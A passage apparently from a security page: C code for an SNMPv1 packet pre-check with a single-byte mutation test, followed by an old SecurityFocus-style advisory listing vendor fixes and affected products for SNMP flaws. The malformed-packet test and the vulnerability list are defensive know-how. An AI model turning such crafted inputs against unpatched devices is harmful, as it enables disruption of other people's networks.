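int snmpv1_precheck(const uint8_t *buf, size_t len, snmp_summary *out)
{
    cur_t dgram = { buf, buf + len }, msg, f, pdu, vbl, vb, oid, val;
    uint8_t tag;
    size_t clen;
    int i;
    memset(out, 0, sizeof *out);
    /* Outer SEQUENCE must cover the datagram exactly (no trailing bytes). */
    if (expect(&dgram, 0x30, &msg) || dgram.p != dgram.end) return SNMP_ERR_BER;
    if (expect(&msg, 0x02, &f)) return SNMP_ERR_BER;            /* version */
    if (f.end - f.p != 1 || f.p[0] != 0) return SNMP_ERR_VERSION;
    if (expect(&msg, 0x04, &f)) return SNMP_ERR_BER;            /* community */
    clen = (size_t)(f.end - f.p);
    if (clen > MAX_COMMUNITY) return SNMP_ERR_LIMIT;
    out->default_community = (clen == 6 && !memcmp(f.p, "public", 6)) ||
                             (clen == 7 && !memcmp(f.p, "private", 7));
    if (read_tlv(&msg, &tag, &pdu) || msg.p != msg.end) return SNMP_ERR_BER;
    if (tag != 0xA0 && tag != 0xA1 && tag != 0xA3) return SNMP_ERR_PDU;
    out->pdu_tag = tag;
    for (i = 0; i < 3; i++)     /* request-id, error-status, error-index */
        if (expect(&pdu, 0x02, &f) || f.end == f.p || f.end - f.p > 4)
            return SNMP_ERR_BER;
    if (expect(&pdu, 0x30, &vbl) || pdu.p != pdu.end) return SNMP_ERR_BER;
    while (vbl.p < vbl.end) {   /* each varbind: SEQUENCE { OID, value } */
        if (expect(&vbl, 0x30, &vb) || expect(&vb, 0x06, &oid)) return SNMP_ERR_BER;
        /* OID must be non-empty and must not end inside a sub-identifier. */
        if (oid.end == oid.p || (oid.end[-1] & 0x80)) return SNMP_ERR_BER;
        if (oid.end - oid.p > MAX_OID_BYTES) return SNMP_ERR_LIMIT;
        if (read_tlv(&vb, &tag, &val) || vb.p != vb.end) return SNMP_ERR_BER;
        if (++out->varbinds > MAX_VARBINDS) return SNMP_ERR_LIMIT;
    }
    return SNMP_OK;
}

/* Constructed sample: GetRequest for sysDescr.0, community "public". */
static const uint8_t SAMPLE_GET[40] = {
    0x30,0x26, 0x02,0x01,0x00, 0x04,0x06,'p','u','b','l','i','c',
    0xa0,0x19, 0x02,0x01,0x01, 0x02,0x01,0x00, 0x02,0x01,0x00,
    0x30,0x0e, 0x30,0x0c, 0x06,0x08,0x2b,0x06,0x01,0x02,0x01,0x01,0x01,0x00,
    0x05,0x00 };

/* Check a copy of SAMPLE_GET with byte idx set to val (idx < 0: unchanged). */
int precheck_mutated(int idx, uint8_t val, size_t len, snmp_summary *out)
{
    uint8_t copy[sizeof SAMPLE_GET];
    memcpy(copy, SAMPLE_GET, sizeof copy);
    if (idx >= 0 && (size_t)idx < sizeof copy) copy[idx] = val;
    return snmpv1_precheck(copy, len < sizeof copy ? len : sizeof copy, out);
}

int main(void) {
    snmp_summary s;
    printf("well-formed: %d\n", precheck_mutated(-1, 0, 40, &s));
    printf("OID length overruns varbind: %d\n", precheck_mutated(29, 0x7f, 40, &s));
    return 0;
}
```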

- Exploit

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Microsoft has released fixes which address this issue.

Cisco has released upgrades. Contact the vendor.

Fixes for Windows NT 4 Terminal Server English and German editions were re-released due to file problems in the original versions.

Nokia fixes for affected versions are available for download directly from Nokia.

Novell will address this issue in NetWare 6 Support Pack 1 and NetWare 5.1 Support Pack 6. Novell has made fixes available for version 4.11 through 6.0.

Multinet and TCPWare users should contact Process Software directly.

AdventNet will release a service pack for all users of their products around February 20, 2002.

Comtek products will be fixed with version 3.5 to be released some time in February 2002.

Lantronix will address this issue in LRS firmware version B1.3/611(020123).

The default installation of HP Secure OS Software for Linux does not include SNMP. Users who have enabled SNMP on HP Secure OS Software for Linux systems are advised to download the RPMs released by Red Hat.

HP Network Node Manager and Emanate Agents are included with ITO/VPO/OVO on Unix, OVO Windows and VPW/OVO Windows. The appropriate HP NNM/Emanate Agents fixes should be installed with these products. The HP OV/SAM Suite version 3.0.1 is prone to trap handling issues when run as an agent. Further details about how the OV/SAM Suite is affected and how to address the issue may be found in the attached advisory (HPSBUX0202-184).

SGI has released advisory 20030405-01-I to address this issue in Brocade firmware.

SGI has released advisory 20030703-01-I to address this issue in Emulex 1Gbit FibreChannel Hub firmware.

Fixes are available for a number of systems:


HP JetDirect x.08.00
  • HP X.21.00
    JetDirect firmware version X.21.00 is not vulnerable. JetDirect Product Numbers that can be freely upgraded to X.08.32, X.21.00 or higher firmware: EIO (Peripherals LaserJet 4000, 5000, 8000, etc...) J3110A 10T [G.08.40] J3111A 10T/10B2/LocalTalk [G.08.40] J3112A Token

  • HP X.21.00
    Jetdirect firmware versions previous to X.08.32 are vulnerable, where X is a letter 'A' through 'K'. JetDirect Product Numbers that can be freely upgraded to X.21.00 or higher firmware: EIO (Peripherals Laserjet 4000, 5000, 8000, ..) J3110A 10T J3111A 10T/10B2/LocalTalk J3112A Token Ring (discontinued) J3


HP Procurve Switch 8000M
  • HP C.09.13
    Fixed version of firmware for HP Procurve Switch 1600M (J4120A), HP Procurve Switch 2400M (J4120A), HP Procurve Switch 2424M (J4122A), HP Procurve Switch 4000M (J4121A), and HP Procurve Switch 8000M (J4110A).
    http://www.hp.com/rnd/software/switches.htm


3Com PS Hub 40

Microsoft Windows NT Enterprise Server 4.0 SP1

IBM AIX 5.1

Microsoft Windows NT Terminal Server 4.0 SP1

Microsoft Windows NT Server 4.0 SP1

Microsoft Windows NT Terminal Server 4.0 SP6

3Com Dual Speed Hub

HP Procurve Switch 2400M
  • HP C.09.13
    Fixed version of firmware for HP Procurve Switch 1600M (J4120A), HP Procurve Switch 2400M (J4120A), HP Procurve Switch 2424M (J4122A), HP Procurve Switch 4000M (J4121A), and HP Procurve Switch 8000M (J4110A).
    http://www.hp.com/rnd/software/switches.htm


Microsoft Windows NT Server 4.0 SP6

Microsoft Windows 2000 Server SP1

Microsoft Windows NT Server 4.0 SP2

Microsoft Windows XP Professional

Microsoft Windows 2000 Server

HP Procurve Switch 4000M
  • HP C.09.13
    Fixed version of firmware for HP Procurve Switch 1600M (J4120A), HP Procurve Switch 2400M (J4120A), HP Procurve Switch 2424M (J4122A), HP Procurve Switch 4000M (J4121A), and HP Procurve Switch 8000M (J4110A).
    http://www.hp.com/rnd/software/switches.htm


Microsoft Windows 2000 Datacenter Server

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows NT Workstation 4.0 SP2

HP Procurve Switch 4108GL

Microsoft Windows NT Workstation 4.0 SP4

Caldera UnixWare 7

Microsoft Windows NT Terminal Server 4.0 SP2

Microsoft Windows 2000 Datacenter Server SP1

3Com PS Hub 50

Microsoft Windows 2000 Professional SP2

3Com Switch 4400

Microsoft Windows 2000 Professional

Microsoft Windows 98

HP JetDirect x.20.00
  • HP X.21.00
    JetDirect firmware version X.21.00 is not vulnerable. JetDirect Product Numbers that can be freely upgraded to X.08.32, X.21.00 or higher firmware: EIO (Peripherals LaserJet 4000, 5000, 8000, etc...) J3110A 10T [G.08.40] J3111A 10T/10B2/LocalTalk [G.08.40] J3112A Token


3Com WebCache 1000

Microsoft Windows NT Workstation 4.0

Microsoft Windows NT Server 4.0

HP HP-UX (VVOS) 11.0 4

SNMP Research Mid-Level Manager 15.3
  • SNMP Research Mid-Level Manager 15.3.1.7
    Mid-Level Manager 15.3.1.7 is available directly from SNMP Research.


Oracle Enterprise Manager 2.0

Sun SunMC 3.0

Sun SunMC 3.0 RR

Sun Enterprise 10000 Server SSP 3.5

HP OpenView Network Node Manager 4.1 1 Solaris

Novell Netware 4.11

IBM AIX 4.3.2

HP OpenView Network Node Manager 5.0 1 Solaris

Real Networks RealPlayer Intranet 5.0

Juniper Networks JUNOS 5.0
  • Juniper Networks JUNOS 5.2
    JUNOS 5.2 is available directly from Juniper Networks.


HP OpenView Network Node Manager 5.0 1

HP OpenView Network Node Manager 5.0 1 HP-UX

HP OpenView Distributed Management 5.0 3

Lotus Domino SNMP Agents 5.0.1 Solaris x86

Caldera OpenServer 5.0.5

Caldera OpenServer 5.0.6

Juniper Networks JUNOS 5.1
  • Juniper Networks JUNOS 5.2
    JUNOS 5.2 is available directly from Juniper Networks.


HP OpenView Distributed Management 6.0

HP OpenView Network Node Manager 6.0 HP-UX 11.X

HP OpenView Network Node Manager 6.0 NT 4.X/Windows 2000

Novell Netware 6.0

Caldera UnixWare 7.1 .0

Oracle Enterprise Manager 9.0.1
